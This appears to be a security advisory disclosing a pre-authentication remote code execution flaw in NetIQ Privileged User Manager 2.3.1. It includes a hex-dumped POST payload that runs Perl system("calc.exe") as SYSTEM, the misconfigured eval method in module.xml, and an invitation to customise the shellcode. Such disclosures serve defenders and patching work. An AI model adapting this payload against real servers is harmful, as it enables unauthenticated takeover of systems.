Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() 
Perl Code Evaluation RCE (pre auth/SYSTEM)

Tested against: Microsoft Windows 2003 r2 sp2
download url: http://download.novell.com/index.jsp
(search "Privileged User Manager")
file tested: NetIQ-PUM-2.3.1.iso
(decompress and launch netiq_pum_manager_2.3.1_x86.msi)

Background:
The mentioned product installs a Windows service (unifid.exe) called 'npum',
display name: "NetIQ Privileged User Manager" which listens on 
default tcp port 443 (https) for incoming connections.

Vulnerabilty:
The secure web interface contains a flaw which allows, without prior 
authentication, to execute a Perl script with SYSTEM privileges.
This can be done by sending a POST request with well formed
data.

Example data:
  0 : 00 00 00 00 00 01 00 14 53 50 46 2e 55 74 69 6c [........SPF.Util]
 10 : 2e 63 61 6c 6c 4d 6f 64 75 6c 65 41 00 00 00 00 [.callModuleA....]
 20 : 02 0a 0a 00 00 00 01 03 00 03 70 6b 74 03 00 06 [..........pkt...]
 30 : 6d 65 74 68 6f 64 02 00 04 65 76 61 6c 00 06 6d [method...eval..m]
 40 : 6f 64 75 6c 65 02 00 08 6c 64 61 70 61 67 6e 74 [odule...ldapagnt]
 50 : 00 04 45 76 61 6c 03 00 07 63 6f 6e 74 65 6e 74 [..Eval...content]
 60 : 02 00 17 73 79 73 74 65 6d 28 22 63 61 6c 63 2e [...system("calc.]
 70 : 65 78 65 22 29 3b 0a 0a 31 3b 0a 0a 31 3b 00 00 [exe");..1;..1;..]
 80 : 09 00 00 09 00 03 75 69 64 02 00 00 00 00 09 00 [......uid.......]
 90 : 08 73 76 63 5f 6e 61 6d 65 02 00 06 61 6e 64 72 [.svc_name...andr]
 A0 : 65 61 00 00 09 [ea...]

Note that the uid argument is empty.

Explaination:

Open C:\Program Files\Novell\npum\service\local\ldapagnt\module.xml
(this is the configuration file of the 'ldapagnt' module).

...
    <Library type="dso" lib="lib/ldapagnt">
      <Method name="init_ldap_cred" init="init_ldapcred" /> 
      <Method name="eval" svc="ldapagnt_eval" />       <--------------------------
    </Library>
...

no role is defined for the eval() method which corresponds to 
the ldapagnt_eval() function inside ldapagnt.dll.

As attachment, proof of concept code, which launches calc.exe 
from remote. Customize the shellcode for your own use.